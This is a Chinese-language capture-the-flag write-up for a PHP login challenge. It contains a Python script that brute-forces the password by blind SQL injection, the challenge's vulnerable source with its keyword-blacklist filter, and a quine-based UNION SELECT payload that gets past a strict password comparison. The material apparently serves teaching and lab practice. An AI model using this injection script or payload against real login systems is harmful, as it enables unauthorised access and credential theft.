1.打开环境,发现一个登录窗口。
2.随便输入用户名和密码回显:
3.当失败时会回显nothing found,以此可以爆破密码。
python脚本如下:
import requests
import time
alp = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~"
def get_pass():
url = "http://1.14.71.254:28843/login.php"
flag = ""
Cookie = {'frontLang':'zh - cn',
'frontDevice':'desktop',
'theme' : 'default',
'adminLang' : 'zh - cn',
'adminDevice' : 'desktop',
'currentGroup': 'design'
}
while(True):
for i in alp:
data = {
'username': 'bilala',
'passwd':f"1'or/**/passwd/**/like/**/'{flag+i}%'#"
}
res = requests.post(url=url,data=data)
time.sleep(0.1)
if "nothing found" not in res.text:
flag+=i
print(flag)
break
elif "~" in i:
return
if __name__=='__main__':
get_pass()
爆破出密码登入后没有给flag,而是给了源码。
<?php
//多加了亿点点过滤
include_once("config.php");
function alertMes($mes,$url){
die("<script>alert('{$mes}');location.href='{$url}';</script>");
}
function checkSql($s) {
if(preg_match("/if|regexp|between|in|flag|=|>|<|and|\||right|left|insert|database|reverse|update|extractvalue|floor|join|substr|&|;|\\\$|char|\x0a|\x09|column|sleep|\ /i",$s)){
alertMes('waf here', 'index.php');
}
}
if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['passwd']) && $_POST['passwd'] != '') {
$username=$_POST['username'];
$password=$_POST['passwd'];
if ($username !== 'bilala') {
alertMes('only bilala can login', 'index.php');
}
checkSql($password);
$sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";
$user_result=mysqli_query($MysqlLink,$sql);
$row = mysqli_fetch_array($user_result);
if (!$row) {
alertMes('nothing found','index.php');
}
if ($row['passwd'] === $password) {
if($password == 'b2f2d15b3ae082ca29697d8dcd420fd7'){
show_source(__FILE__);
die;
}
else{
die($FLAG);
}
} else {
alertMes("wrong password",'index.php');
}
}
?>
关键是它要求强比较相同,但弱比较不同,所以要用到Quine,Quine是一种自生产技术,可以使数据库输入和输出相同。
payload:
username=bilala&passwd='/**/union/**/select/**/replace(replace('"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#',0x22,0x27),0x25,'"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#')#&login=%E7%99%BB%E5%BD%95
参考文章: